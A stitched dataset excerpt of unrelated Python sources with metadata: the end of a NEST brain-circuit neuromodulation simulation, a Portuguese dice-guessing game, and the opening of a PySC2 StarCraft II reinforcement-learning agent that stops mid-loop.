connect(hypothalamus[hypothalamus_pvn_GABA], motor[motor_5HT], syn_type=GABA, weight_coef=0.005)
# inside LC
connect(lc[lc_Ach], lc[lc_GABA], syn_type=ACh, weight_coef=0.005)
connect(lc[lc_Ach], lc[lc_N0], syn_type=ACh, weight_coef=0.005)
connect(lc[lc_Ach], lc[lc_N1], syn_type=ACh, weight_coef=0.005)
connect(lc[lc_D1], lc[lc_N0], syn_type=DA_ex, weight_coef=0.005)
connect(lc[lc_D2], lc[lc_N1], syn_type=DA_in, weight_coef=0.005)
connect(lc[lc_GABA], lc[lc_N0], syn_type=GABA, weight_coef=0.005)
# * * * dorsal pathway * * *
connect(pgi[pgi_Glu], lc[lc_N0], syn_type=Glu, weight_coef=0.005)
connect(pgi[pgi_Glu], lc[lc_N1], syn_type=Glu, weight_coef=0.005)
connect(pgi[pgi_GABA], lc[lc_GABA], syn_type=GABA, weight_coef=0.005)
connect(prh[prh_GABA], lc[lc_GABA], syn_type=GABA, weight_coef=0.005)
connect(striatum[striatum_tan], lc[lc_GABA], syn_type=GABA, weight_coef=0.005)
connect(vta[vta_DA0], lc[lc_D1], syn_type=DA_ex, weight_coef=0.005)
connect(vta[vta_DA0], lc[lc_D2], syn_type=DA_in, weight_coef=0.005)
connect(vta[vta_DA1], striatum[striatum_tan], syn_type=DA_ex, weight_coef=0.005)
connect(vta[vta_DA1], striatum[striatum_GABA], syn_type=DA_ex, weight_coef=0.005)
wse = 0.001
wsi = 0.5
#
# * * * NIGROSTRIATAL PATHWAY* * *
connect(motor[motor_Glu0], striatum[striatum_D1], syn_type=Glu, weight_coef=0.005)
connect(motor[motor_Glu0], snc[snc_DA], syn_type=Glu, weight_coef=0.005)
connect(motor[motor_Glu0], striatum[striatum_D2], syn_type=Glu, weight_coef=0.05)
connect(motor[motor_Glu0], thalamus[thalamus_Glu], syn_type=Glu, weight_coef=0.003) # 0.0008
connect(motor[motor_Glu0], prefrontal[pfc_5HT], syn_type=Glu, weight_coef=0.003) ######not in the diagram
connect(motor[motor_Glu0], motor[motor_5HT], syn_type=Glu, weight_coef=0.003) ######not in the diagram
connect(motor[motor_Glu0], stn[stn_Glu], syn_type=Glu, weight_coef=7)
connect(motor[motor_Glu1], striatum[striatum_D1], syn_type=Glu)
connect(motor[motor_Glu1], striatum[striatum_D2], syn_type=Glu)
connect(motor[motor_Glu0], thalamus[thalamus_Glu], syn_type=Glu)
connect(motor[motor_Glu1], stn[stn_Glu], syn_type=Glu)
connect(motor[motor_Glu1], nac[nac_GABA0], syn_type=GABA)
connect(striatum[striatum_tan], striatum[striatum_D1], syn_type=GABA)
connect(striatum[striatum_tan], striatum[striatum_D2], syn_type=Glu)
connect(striatum[striatum_D1], snr[snr_GABA], syn_type=GABA, weight_coef=0.001)
connect(striatum[striatum_D1], gpi[gpi_GABA], syn_type=GABA, weight_coef=0.001)
connect(striatum[striatum_D1], gpe[gpe_GABA], syn_type=GABA, weight_coef=0.005)
connect(striatum[striatum_D2], gpe[gpe_GABA], syn_type=GABA, weight_coef=1)
connect(gpe[gpe_GABA], stn[stn_Glu], syn_type=GABA, weight_coef=0.0001)
connect(gpe[gpe_GABA], striatum[striatum_D1], syn_type=GABA, weight_coef=0.001)
connect(gpe[gpe_GABA], striatum[striatum_D2], syn_type=GABA, weight_coef=0.3)
connect(gpe[gpe_GABA], gpi[gpi_GABA], syn_type=GABA, weight_coef=0.0001)
connect(gpe[gpe_GABA], snr[snr_GABA], syn_type=GABA, weight_coef=0.0001)
connect(stn[stn_Glu], snr[snr_GABA], syn_type=Glu, weight_coef=0.2)
connect(stn[stn_Glu], gpi[gpi_GABA], syn_type=Glu, weight_coef=0.2)
connect(stn[stn_Glu], gpe[gpe_GABA], syn_type=Glu, weight_coef=0.3)
connect(stn[stn_Glu], snc[snc_DA], syn_type=Glu, weight_coef=0.01)
connect(gpi[gpi_GABA], thalamus[thalamus_Glu], syn_type=GABA, weight_coef=1) # weight_coef=3)
connect(snr[snr_GABA], thalamus[thalamus_Glu], syn_type=GABA, weight_coef=1) # weight_coef=3)
connect(thalamus[thalamus_Glu], motor[motor_Glu1], syn_type=Glu)
connect(thalamus[thalamus_Glu], stn[stn_Glu], syn_type=Glu, weight_coef=1) # 005
connect(thalamus[thalamus_Glu], striatum[striatum_D1], syn_type=Glu, weight_coef=0.001)
connect(thalamus[thalamus_Glu], striatum[striatum_D2], syn_type=Glu, weight_coef=0.001)
connect(thalamus[thalamus_Glu], striatum[striatum_tan], syn_type=Glu, weight_coef=0.001)
connect(thalamus[thalamus_Glu], striatum[striatum_Ach], syn_type=Glu, weight_coef=0.001)
connect(thalamus[thalamus_Glu], striatum[striatum_GABA], syn_type=Glu, weight_coef=0.001)
connect(thalamus[thalamus_Glu], striatum[striatum_5HT], syn_type=Glu, weight_coef=0.001)
connect(thalamus[thalamus_Glu], nac[nac_GABA0], syn_type=Glu)
connect(thalamus[thalamus_Glu], nac[nac_GABA1], syn_type=Glu)
connect(thalamus[thalamus_Glu], nac[nac_Ach], syn_type=Glu)
connect(thalamus[thalamus_Glu], nac[nac_DA], syn_type=Glu)
connect(thalamus[thalamus_Glu], nac[nac_5HT], syn_type=Glu)
connect(thalamus[thalamus_Glu], nac[nac_NA], syn_type=Glu)
# * * * INTEGRATED PATHWAY * * *
connect(prefrontal[pfc_Glu0], vta[vta_DA0], syn_type=Glu)
connect(prefrontal[pfc_Glu0], nac[nac_GABA1], syn_type=Glu)
connect(prefrontal[pfc_Glu1], vta[vta_GABA2], syn_type=Glu)
connect(prefrontal[pfc_Glu1], nac[nac_GABA1], syn_type=Glu)
connect(amygdala[amygdala_Glu], nac[nac_GABA0], syn_type=Glu)
connect(amygdala[amygdala_Glu], nac[nac_GABA1], syn_type=Glu)
connect(amygdala[amygdala_Glu], nac[nac_Ach], syn_type=Glu)
connect(amygdala[amygdala_Glu], nac[nac_DA], syn_type=Glu)
connect(amygdala[amygdala_Glu], nac[nac_5HT], syn_type=Glu)
connect(amygdala[amygdala_Glu], nac[nac_NA], syn_type=Glu)
connect(amygdala[amygdala_Glu], striatum[striatum_D1], syn_type=Glu, weight_coef=0.3)
connect(amygdala[amygdala_Glu], striatum[striatum_D2], syn_type=Glu, weight_coef=0.3)
connect(amygdala[amygdala_Glu], striatum[striatum_tan], syn_type=Glu, weight_coef=0.3)
connect(amygdala[amygdala_Glu], striatum[striatum_Ach], syn_type=Glu, weight_coef=0.3)
connect(amygdala[amygdala_Glu], striatum[striatum_5HT], syn_type=Glu, weight_coef=0.3)
connect(amygdala[amygdala_Glu], striatum[striatum_GABA], syn_type=Glu, weight_coef=0.3)
# * * * MESOCORTICOLIMBIC PATHWAY * * *
connect(nac[nac_Ach], nac[nac_GABA1], syn_type=ACh)
connect(nac[nac_GABA0], nac[nac_GABA1], syn_type=GABA, )
connect(nac[nac_GABA1], vta[vta_GABA2], syn_type=GABA, )
connect(vta[vta_GABA0], prefrontal[pfc_Glu0], syn_type=GABA, )
connect(vta[vta_GABA0], pptg[pptg_GABA], syn_type=GABA, )
connect(vta[vta_GABA1], vta[vta_DA0], syn_type=GABA, )
connect(vta[vta_GABA1], vta[vta_DA1], syn_type=GABA, )
connect(vta[vta_GABA2], nac[nac_GABA1], syn_type=GABA, )
connect(pptg[pptg_GABA], vta[vta_GABA0], syn_type=GABA, )
connect(pptg[pptg_GABA], snc[snc_GABA], syn_type=GABA, weight_coef=0.005)
connect(pptg[pptg_ACh], vta[vta_GABA0], syn_type=ACh)
connect(pptg[pptg_ACh], vta[vta_DA1], syn_type=ACh)
connect(pptg[pptg_Glu], vta[vta_GABA0], syn_type=Glu)
connect(pptg[pptg_Glu], vta[vta_DA1], syn_type=Glu)
connect(pptg[pptg_ACh], striatum[striatum_D1], syn_type=ACh, weight_coef=0.3)
connect(pptg[pptg_ACh], snc[snc_GABA], syn_type=ACh, weight_coef=0.005)
connect(pptg[pptg_Glu], snc[snc_DA], syn_type=Glu, weight_coef=0.005)
if noradrenaline_flag:
logger.debug("* * * Making neuromodulating connections...")
# vt_ex = nest.Create('volume_transmitter')
# vt_in = nest.Create('volume_transmitter')
# NORA_synparams_ex['vt'] = vt_ex[0]
# NORA_synparams_in['vt'] = vt_in[0]
connect(nts[nts_a1], lc[lc_N0], syn_type=NA_ex, weight_coef=0.005)
connect(nts[nts_a1], bnst[bnst_Glu], syn_type=NA_ex, weight_coef=0.005)
connect(nts[nts_a2], lc[lc_N1], syn_type=NA_ex, weight_coef=0.005)
connect(nts[nts_a2], striatum[striatum_tan], syn_type=NA_ex, weight_coef=0.005)
connect(nts[nts_a2], striatum[striatum_GABA], syn_type=NA_ex, weight_coef=0.005)
connect(nts[nts_a2], amygdala[amygdala_Glu], syn_type=NA_ex, weight_coef=0.005)
connect(nts[nts_a2], amygdala[amygdala_Ach], syn_type=NA_ex, weight_coef=0.005)
connect(nts[nts_a2], amygdala[amygdala_GABA], syn_type=NA_ex, weight_coef=0.005)
connect(nts[nts_a2], bnst[bnst_Glu], syn_type=NA_ex, weight_coef=0.005)
connect(lc[lc_N0], motor[motor_Glu0], syn_type=NA_ex, weight_coef=0.005)
connect(lc[lc_N0], motor[motor_Glu1], syn_type=NA_ex, weight_coef=0.005)
connect(lc[lc_N0], prefrontal[pfc_Glu1], syn_type=NA_ex, weight_coef=0.005)
connect(lc[lc_N0], vta[vta_a1], syn_type=NA_ex, weight_coef=0.005)
connect(lc[lc_N0], ldt[ldt_a1], syn_type=NA_ex, weight_coef=0.005)
connect(lc[lc_N0], ldt[ldt_a2], syn_type=NA_ex, weight_coef=0.005)
connect(lc[lc_N1], striatum[striatum_tan], syn_type=NA_ex, weight_coef=0.005)
connect(lc[lc_N1], striatum[striatum_GABA], syn_type=NA_ex, weight_coef=0.005)
connect(lc[lc_N1], rn[rn_a1], syn_type=NA_ex, weight_coef=0.005)
connect(lc[lc_N1], rn[rn_a2], syn_type=NA_ex, weight_coef=0.005)
connect(rn[rn_a1], rn[rn_dr], syn_type=NA_ex, weight_coef=0.005)
connect(rn[rn_a2], rn[rn_mnr], syn_type=NA_ex, weight_coef=0.005)
connect(rn[rn_a2], rn[rn_rpa], syn_type=NA_ex, weight_coef=0.005)
connect(rn[rn_a2], rn[rn_rmg], syn_type=NA_ex, weight_coef=0.005)
# connect(vta[vta_a1], vta[vta_DA1], syn_type=NA_in, weight_coef=0.005)
if serotonin_flag:
# * * * AFFERENT PROJECTIONS * *
connect(vta[vta_5HT], rn[rn_dr], syn_type=SERO_ex, weight_coef=wse)
connect(septum[septum_5HT], rn[rn_dr], syn_type=SERO_ex, weight_coef=wse)
connect(septum[septum_5HT], rn[rn_mnr], syn_type=SERO_ex, weight_coef=wse)
connect(prefrontal[pfc_5HT], rn[rn_dr], syn_type=SERO_ex, weight_coef=wse)
connect(prefrontal[pfc_5HT], rn[rn_mnr], syn_type=SERO_ex, weight_coef=wse)
connect(hypothalamus[hypothalamus_5HT], rn[rn_rmg], syn_type=SERO_ex, weight_coef=wse)
connect(hypothalamus[hypothalamus_5HT], rn[rn_rpa], syn_type=SERO_ex, weight_coef=wse)
connect(periaqueductal_gray[periaqueductal_gray_5HT], rn[rn_rmg], syn_type=SERO_ex, weight_coef=wse)
connect(periaqueductal_gray[periaqueductal_gray_5HT], rn[rn_rpa], syn_type=SERO_ex, weight_coef=wse)
connect(bnst[bnst_5HT], rn[rn_rpa], syn_type=SERO_ex, weight_coef=wse)
connect(amygdala[amygdala_5HT], rn[rn_rpa], syn_type=SERO_ex, weight_coef=wse)
connect(amygdala[amygdala_5HT], rn[rn_rmg], syn_type=SERO_ex, weight_coef=wse)
connect(hippocampus[hippocampus_5HT], rn[rn_dr], syn_type=SERO_ex, weight_coef=wse)
# * * * EFFERENT PROJECTIONS * * *
connect(rn[rn_dr], striatum[striatum_5HT], syn_type=SERO_in, weight_coef=wsi) # !!!
connect(rn[rn_dr], striatum[striatum_D2], syn_type=SERO_in, weight_coef=wsi) # !!!
connect(rn[rn_dr], striatum[striatum_GABA], syn_type=SERO_in, weight_coef=wsi) # !!!
connect(rn[rn_dr], striatum[striatum_Ach], syn_type=SERO_in, weight_coef=wsi) # !!!
connect(rn[rn_dr], nac[nac_5HT], syn_type=SERO_in, weight_coef=wsi)
connect(rn[rn_dr], nac[nac_GABA0], syn_type=SERO_in, weight_coef=wsi)
connect(rn[rn_dr], nac[nac_GABA1], syn_type=SERO_in, weight_coef=wsi)
connect(rn[rn_dr], nac[nac_Ach], syn_type=SERO_in, weight_coef=wsi)
connect(rn[rn_dr], nac[nac_DA], syn_type=SERO_in, weight_coef=wsi)
connect(rn[rn_dr], snr[snr_GABA], syn_type=SERO_in, weight_coef=wsi)
connect(rn[rn_dr], septum[septum_5HT], syn_type=SERO_in, weight_coef=wsi)
connect(rn[rn_dr], thalamus[thalamus_5HT], syn_type=SERO_in, weight_coef=wsi) # ? tune weights
connect(rn[rn_dr], thalamus[thalamus_Glu], syn_type=SERO_in, weight_coef=wsi) # ? tune weights
connect(rn[rn_dr], lateral_cortex[lateral_cortex_5HT], syn_type=SERO_in, weight_coef=wsi)
connect(rn[rn_dr], entorhinal_cortex[entorhinal_cortex_5HT], syn_type=SERO_in, weight_coef=wsi)
connect(rn[rn_dr], prefrontal[pfc_5HT], syn_type=SERO_in, weight_coef=wsi) # !!!
connect(rn[rn_dr], prefrontal[pfc_Glu0], syn_type=SERO_in, weight_coef=wsi) # !!!
connect(rn[rn_dr], prefrontal[pfc_Glu1], syn_type=SERO_in, weight_coef=wsi) # !!!
connect(rn[rn_dr], prefrontal[pfc_DA], syn_type=SERO_in, weight_coef=wsi) # !!!
connect(rn[rn_dr], prefrontal[pfc_NA], syn_type=SERO_in, weight_coef=wsi) # !!!
connect(rn[rn_dr], lateral_tegmental_area[lateral_tegmental_area_5HT], syn_type=SERO_in, weight_coef=wsi)
connect(rn[rn_dr], lc[lc_5HT], syn_type=SERO_in, weight_coef=wsi)
connect(rn[rn_dr], lc[lc_N0], syn_type=SERO_in, weight_coef=wsi)
connect(rn[rn_dr], bnst[bnst_5HT], syn_type=SERO_in, weight_coef=wsi)
connect(rn[rn_dr], bnst[bnst_Glu], syn_type=SERO_in, weight_coef=wsi)
connect(rn[rn_dr], bnst[bnst_GABA], syn_type=SERO_in, weight_coef=wsi)
connect(rn[rn_dr], bnst[bnst_Ach], syn_type=SERO_in, weight_coef=wsi)
connect(rn[rn_dr], hippocampus[hippocampus_5HT], syn_type=SERO_in, weight_coef=wsi)
connect(rn[rn_dr], amygdala[amygdala_5HT], syn_type=SERO_in, weight_coef=wsi)
connect(rn[rn_dr], amygdala[amygdala_Glu], syn_type=SERO_in, weight_coef=wsi)
connect(rn[rn_dr], amygdala[amygdala_GABA], syn_type=SERO_in, weight_coef=wsi)
connect(rn[rn_dr], amygdala[amygdala_Ach], syn_type=SERO_in, weight_coef=wsi)
connect(rn[rn_mnr], vta[vta_5HT], syn_type=SERO_in, weight_coef=wsi) # !!! 0.005
connect(rn[rn_mnr], vta[vta_a1], syn_type=SERO_in, weight_coef=wsi) # !!! 0.005
connect(rn[rn_mnr], vta[vta_DA1], syn_type=SERO_in, weight_coef=wsi) # !!! 0.005
connect(rn[rn_mnr], thalamus[thalamus_5HT], syn_type=SERO_in, weight_coef=wsi) # ?
connect(rn[rn_mnr], thalamus[thalamus_Glu], syn_type=SERO_in, weight_coef=wsi) # ? tune weights 0.005
connect(rn[rn_mnr], prefrontal[pfc_5HT], syn_type=SERO_in, weight_coef=wsi)
connect(rn[rn_mnr], prefrontal[pfc_Glu0], syn_type=SERO_in, weight_coef=wsi)
connect(rn[rn_mnr], prefrontal[pfc_Glu1], syn_type=SERO_in, weight_coef=wsi)
connect(rn[rn_mnr], motor[motor_Glu0], syn_type=SERO_in, weight_coef=wsi)
connect(rn[rn_mnr], motor[motor_5HT], syn_type=SERO_in, weight_coef=wsi)
connect(rn[rn_mnr], insular_cortex[insular_cortex_5HT], syn_type=SERO_in, weight_coef=wsi)
connect(rn[rn_mnr], medial_cortex[medial_cortex_5HT], syn_type=SERO_in, weight_coef=wsi)
connect(rn[rn_mnr], neocortex[neocortex_5HT], syn_type=SERO_in, weight_coef=wsi)
connect(rn[rn_mnr], hypothalamus[hypothalamus_5HT], syn_type=SERO_in, weight_coef=wsi)
connect(rn[rn_mnr], hypothalamus[hypothalamus_pvn_GABA], syn_type=SERO_in, weight_coef=wsi)
connect(rn[rn_mnr], hippocampus[hippocampus_5HT], syn_type=SERO_in, weight_coef=wsi)
# * * * THALAMOCORTICAL PATHWAY * * *
connect(thalamus[thalamus_5HT], prefrontal[pfc_5HT], syn_type=SERO_in, weight_coef=wse)
connect(thalamus[thalamus_5HT], motor[motor_5HT], syn_type=SERO_ex, weight_coef=wse)
connect(thalamus[thalamus_5HT], motor[motor_Glu0], syn_type=SERO_ex, weight_coef=wse)
connect(prefrontal[pfc_5HT], thalamus[thalamus_5HT], syn_type=SERO_in, weight_coef=wsi) # main was 0.005
connect(motor[motor_5HT], thalamus[thalamus_5HT], syn_type=SERO_in, weight_coef=wsi) # main was 0.005
if dopamine_flag:
logger.debug("* * * Making neuromodulating connections...")
# NIGROSTRIATAL
connect(snc[snc_DA], striatum[striatum_D1], syn_type=DA_ex)
connect(snc[snc_DA], gpe[gpe_GABA], syn_type=DA_ex)
connect(snc[snc_DA], stn[stn_Glu], syn_type=DA_ex)
connect(snc[snc_DA], nac[nac_GABA0], syn_type=DA_ex)
connect(snc[snc_DA], nac[nac_GABA1], syn_type=DA_ex)
connect(snc[snc_DA], striatum[striatum_D2], syn_type=DA_in)
connect(snc[snc_DA], striatum[striatum_tan], syn_type=DA_in)
# MESOCORTICOLIMBIC
connect(vta[vta_DA0], striatum[striatum_D1], syn_type=DA_ex)
connect(vta[vta_DA0], striatum[striatum_D2], syn_type=DA_in)
connect(vta[vta_DA0], prefrontal[pfc_Glu0], syn_type=DA_ex)
connect(vta[vta_DA0], prefrontal[pfc_Glu1], syn_type=DA_ex)
connect(vta[vta_DA1], nac[nac_GABA0], syn_type=DA_ex)
connect(vta[vta_DA1], nac[nac_GABA1], syn_type=DA_ex)
if dopamine_flag and serotonin_flag and noradrenaline_flag:
# * * * DOPAMINE INTERACTION * * *
connect(prefrontal[pfc_5HT], prefrontal[pfc_DA], syn_type=SERO_ex, weight_coef=wse)
connect(prefrontal[pfc_DA], vta[vta_5HT], syn_type=DA_in, weight_coef=0.005)
connect(prefrontal[pfc_DA], vta[vta_DA1], syn_type=DA_in, weight_coef=0.005)
# connect(vta[vta_5HT], vta[vta_DA1], syn_type=SERO_in, weight_coef=0.005)
connect(vta[vta_5HT], vta[vta_DA1], syn_type=SERO_ex, weight_coef=wse)
connect(vta[vta_DA1], prefrontal[pfc_5HT], syn_type=DA_ex, weight_coef=0.005)
connect(vta[vta_DA1], prefrontal[pfc_DA], syn_type=DA_ex, weight_coef=0.005)
# connect(vta[vta_DA1], striatum[striatum_5HT], syn_type=DOPA_in, weight_coef=0.005)
connect(vta[vta_DA1], striatum[striatum_5HT], syn_type=DA_ex, weight_coef=0.005)
# connect(vta[vta_DA1], striatum[striatum_DA], syn_type=DOPA_in, weight_coef=0.005)
connect(vta[vta_DA1], striatum[striatum_D1], syn_type=DA_ex, weight_coef=0.005)
# connect(vta[vta_DA1], nac[nac_5HT], syn_type=DOPA_in, weight_coef=0.005)
connect(vta[vta_DA1], nac[nac_5HT], syn_type=DA_ex, weight_coef=0.005)
# connect(vta[vta_DA1], nac[nac_DA], syn_type=DOPA_in, weight_coef=0.005)
connect(vta[vta_DA1], nac[nac_DA], syn_type=DA_ex, weight_coef=0.005)
# connect(striatum[striatum_5HT], striatum[striatum_DA], syn_type=SERO_in, weight_coef=0.005)
connect(striatum[striatum_5HT], striatum[striatum_D1], syn_type=SERO_ex,
weight_coef=wse) # ??????????????????????????????????? D1, D2?
# connect(striatum[striatum_DA], snr[snr_GABA], syn_type=DOPA_in, weight_coef=0.005)
connect(striatum[striatum_D1], snr[snr_GABA], syn_type=DA_ex, weight_coef=0.005)
# connect(striatum[striatum_DA], snc[snc_DA], syn_type=DOPA_in, weight_coef=0.005)
connect(striatum[striatum_D1], snc[snc_GABA], syn_type=DA_ex, weight_coef=0.005)
connect(striatum[striatum_D1], snc[snc_DA], syn_type=DA_ex, weight_coef=0.005)
connect(nac[nac_5HT], nac[nac_DA], syn_type=SERO_ex, weight_coef=wse)
connect(snr[snr_GABA], snc[snc_DA], syn_type=SERO_in, weight_coef=wsi)
connect(snc[snc_GABA], striatum[striatum_5HT], syn_type=DA_in, weight_coef=0.005) # ?
connect(snc[snc_DA], striatum[striatum_5HT], syn_type=DA_in, weight_coef=0.005)
connect(snc[snc_DA], striatum[striatum_D1], syn_type=DA_in, weight_coef=0.005)
connect(snc[snc_DA], nac[nac_5HT], syn_type=DA_in, weight_coef=0.005)
connect(snc[snc_DA], nac[nac_DA], syn_type=DA_in, weight_coef=0.005)
connect(lc[lc_5HT], lc[lc_D1], syn_type=SERO_ex, weight_coef=0.005)
connect(lc[lc_D1], rn[rn_dr], syn_type=DA_ex, weight_coef=0.005)
# * * * NORADRENALINE INTERACTION * * *
connect(lc[lc_5HT], lc[lc_N0], syn_type=SERO_in, weight_coef=0.005)
connect(lc[lc_5HT], lc[lc_N1], syn_type=SERO_in, weight_coef=0.005)
# * * * EFFERENT * * *
# * * * CORTICOSPINAL TRACT * * *
# connect(motor[motor_Glu1], medulla[medulla_GABA], syn_type=GABA, weight_coef=0.01)
connectIn(motor[motor_Glu1], spine[spine_Glu1], syn_type=Glu)
connectIn(spine[spine_Glu1], nmj[nmj_Glu], syn_type=Glu)
# # * * * CORTICOBULBAR TRACT * * *
connect(motor[motor_Glu0], medulla[medulla_GABA], syn_type=Glu)
# # * * * RETICULOSPINAL TRACT * * *
connect(pons[pons_Glu], spine[spine_GABA], syn_type=Glu)
connect(medulla[medulla_GABA], spine[spine_GABA], syn_type=GABA)
# * * * AFFERENT * * *
# * * * SPINOTHALAMIC TRACT * * *
connect(cellBodies[cellBodies_Glu], spine[spine_Glu2], syn_type=Glu)
connect(spine[spine_Glu2], thalamus[thalamus_Glu], syn_type=Glu)
logger.debug("* * * Attaching spike generators...")
# #################################surprise
connect_generator(nts[nts_a1], 0., 250., rate=250, coef_part=1)
connect_generator(nts[nts_a2], 0., 250., rate=250, coef_part=1)
connect_generator(prh[prh_GABA], 0., 250., rate=250, coef_part=1)
connect_generator(pgi[pgi_GABA], 0., 250., rate=250, coef_part=1)
connect_generator(pgi[pgi_Glu], 0., 250., rate=250, coef_part=1)
connect_generator(ldt[ldt_a1], 0., 250., rate=250, coef_part=1)
connect_generator(ldt[ldt_a2], 0., 250., rate=250, coef_part=1)
connect_generator(ldt[ldt_Ach], 0., 250., rate=250, coef_part=1)
connect_generator(lc[lc_N0], 0., 250., rate=250, coef_part=1)
connect_generator(lc[lc_N1], 0., 250., rate=250, coef_part=1)
connect_generator(prefrontal[pfc_5HT], 0., 250., rate=250, coef_part=1)
connect_generator(motor[motor_5HT], 0., 250., rate=250, coef_part=1)
connect_generator(rn[rn_dr], 0., 250., rate=250, coef_part=1)
connect_generator(rn[rn_mnr], 0., 250., rate=250, coef_part=1)
connect_generator(cellBodies[cellBodies_Glu], 200., 500., rate=250, coef_part=1)
#
# ############################anger/rage
# connect_generator(nts[nts_a1], 400., 600., rate=250, coef_part=1)
# connect_generator(nts[nts_a2], 400., 600., rate=250, coef_part=1)
# connect_generator(prh[prh_GABA], 400., 600., rate=250, coef_part=1)
# connect_generator(pgi[pgi_GABA], 400., 600., rate=250, coef_part=1)
# connect_generator(pgi[pgi_Glu], 400., 600., rate=250, coef_part=1)
# connect_generator(ldt[ldt_a1], 400., 600., rate=250, coef_part=1)
# connect_generator(ldt[ldt_a2], 400., 600., rate=250, coef_part=1)
# connect_generator(ldt[ldt_Ach], 400., 600., rate=250, coef_part=1)
# connect_generator(lc[lc_N0], 400., 600., rate=250, coef_part=1)
# # connect_generator(lc[lc_N1], 400., 600., rate=250, coef_part=1)
#
# connect_generator(motor[motor_Glu0], 400., 600., rate=250, coef_part=1)
# connect_generator(pptg[pptg_GABA], 400., 600., rate=250, coef_part=1)
# connect_generator(pptg[pptg_Glu], 400., 600., rate=250, coef_part=1)
# connect_generator(pptg[pptg_ACh], 400., 600., rate=250, coef_part=1)
# connect_generator(amygdala[amygdala_Glu], 400., 600., rate=250, coef_part=1)
# connect_generator(snc[snc_DA], 400., 600., rate=250, coef_part=1)
# connect_generator(vta[vta_DA0], 400., 600., rate=250, coef_part=1)
##connect_generator(pons[pons_5HT], 400., 600., rate=250, coef_part=1)
##connect_generator(periaqueductal_gray[periaqueductal_gray_5HT], 400., 600., rate=250, coef_part=1)
##connect_generator(reticular_formation[reticular_formation_5HT], 400., 600., rate=250, coef_part=1)
logger.debug("* * * Attaching spikes detector")
for part in getAllParts():
connect_detector(part)
logger.debug("* * * Attaching multimeters")
for part in getAllParts():
connect_multimeter(part)
del generate_neurons, connect, connect_generator, connect_detector, connect_multimeter
endbuild = datetime.datetime.now()
simulate()
get_log(startbuild, endbuild)
save(GUI=status_gui)
|
[
"guyfulla@gmail.com"
] |
guyfulla@gmail.com
|
77aee12c7c33e199445d96492a54a4d8c66a7a51
|
3a4cc16bf5fa10feedbb26623f1df14594f05a25
|
/jogodedados.py
|
abd944c9571c6f8756414a25fd04e1fdaa173ffe
|
[] |
no_license
|
edsoncpsilva/Curso-Python
|
12f89ae0049e7909cab5e98ff9adbf3dfa003d25
|
939ccccb9f3beb5ee7a72fa96dfd0240fbd185fa
|
refs/heads/master
| 2020-03-24T02:21:57.707429
| 2018-08-17T20:19:45
| 2018-08-17T20:19:45
| 142,372,961
| 0
| 0
| null | null | null | null |
UTF-8
|
Python
| false
| false
| 1,272
|
py
|
#==> jogo de dados de 6 lados
#importar biblioteca
import random
#variaveis
sair = 's'
qtd = 0
#loop de interacao
while (sair == 's'):
#interacao
print()
numero = int(input('Digite o numero que irá sair entre 1 e 6?:' ))
nro_sorte = random.randrange(1, 7)
if numero == nro_sorte:
print('Acertei, estou com sorte!!!!')
print()
exit()
if numero > nro_sorte:
print('você digitou um numero Maior, tente novamente')
print()
if numero < nro_sorte:
print('você digitou um numero Menor, tente novamente')
print()
print('-'*70)
print('==> Numero Sorteado:' + str(nro_sorte))
print('-'*70)
#validar opcao de SAIR
ok = 'nok'
while (ok == 'nok'):
sair = input('Deseja Continuar Tentando (s/n): ')
if sair == 's':
ok = 'ok'
if sair == 'S':
sair = 's'
ok = 'ok'
if sair == 'n':
ok = 'ok'
if sair == 'N':
sair = 'n'
ok = 'ok'
if ok == 'nok':
print('Opcao Invalida, digite apenas "S" ou "N"')
#controlar quantidade de tentativas
if sair == 's':
qtd = qtd + 1
if qtd == 4:
print()
print('********************************************')
print('***** excedeu a qtd de tentativas de 2 *****')
print('********************************************')
sair = 'n'
print()
print('Fim de Jogo !!!!')
|
[
"noreply@github.com"
] |
noreply@github.com
|
1a701ab367bd7353d683543ba01c68dafb9c47e1
|
3536b829b5733807ffca9849e7ad463c43979c09
|
/sc2bot/agents/battle_agent.py
|
22e9a7bbc1b8d9e4a1550ce87856884d6aaf1e26
|
[] |
no_license
|
alanxzhou/sc2bot
|
9b8d33dacc32074a70b8b4007f60801d6ff8037c
|
0eb2a3f733ea31250e29a123213b407ad9189a40
|
refs/heads/master
| 2020-09-04T17:40:32.608263
| 2020-03-16T23:32:59
| 2020-03-16T23:32:59
| 219,835,624
| 1
| 0
| null | null | null | null |
UTF-8
|
Python
| false
| false
| 12,381
|
py
|
from abc import ABC, abstractmethod
import copy
from collections import deque
import pickle
import matplotlib.pyplot as plt
import numpy as np
import os
import time
from pysc2.agents.scripted_agent import _xy_locs
from pysc2.agents.base_agent import BaseAgent
from pysc2.lib import actions
from pysc2.lib import features
from sc2bot.utils.epsilon import Epsilon
from sc2bot.utils.replay_memory import ReplayMemory, Transition
from sc2bot.models.nn_models import FeatureCNN, FeatureCNNFCLimited, FeatureCNNFCBig, BeaconCNN2
from sc2bot.agents.rl_agent import BaseRLAgent
import torch
import torch.nn as nn
import torch.optim as optim
_PLAYER_RELATIVE = features.SCREEN_FEATURES.player_relative.index
_PLAYER_FRIENDLY = 1
_PLAYER_NEUTRAL = 3 # beacon/minerals
_PLAYER_HOSTILE = 4
_NO_OP = actions.FUNCTIONS.no_op.id
_MOVE_SCREEN = actions.FUNCTIONS.Move_screen.id
_ATTACK_SCREEN = actions.FUNCTIONS.Attack_screen.id
_SELECT_ARMY = actions.FUNCTIONS.select_army.id
_NOT_QUEUED = [0]
_SELECT_ALL = [0]
_SELECT_POINT = actions.FUNCTIONS.select_point.id
_UNIT_TYPE = 6
_SELECTED = 7
_UNIT_HIT_POINTS = 8
FUNCTIONS = actions.FUNCTIONS
_PLAYER_ENEMY = features.PlayerRelative.ENEMY
class BattleAgent(BaseRLAgent):
"""
Agent where the entire army is selected
"""
def __init__(self, save_name=None, load_name=None):
super(BattleAgent, self).__init__(save_name=save_name, load_name=load_name)
self.initialize_model(FeatureCNNFCBig(3, screen_size=self._screen_size))
self.steps_before_training = 5000
self.obs = None
self.features = [_PLAYER_RELATIVE, _UNIT_TYPE, _UNIT_HIT_POINTS]
self.train_q_per_step = 1
def run_loop(self, env, max_frames=0, max_episodes=10000, save_checkpoints=500, evaluate_checkpoints=10):
"""A run loop to have agents and an environment interact."""
total_frames = 0
start_time = time.time()
action_spec = env.action_spec()
observation_spec = env.observation_spec()
self.setup(observation_spec, action_spec)
try:
while self.n_episodes < max_episodes:
obs = env.reset()[0]
# remove unit selection from the equation by selecting the entire army on every new game.
select_army = actions.FunctionCall(_SELECT_ARMY, [[False]])
obs = env.step([select_army])[0]
self.reset()
episode_reward = 0
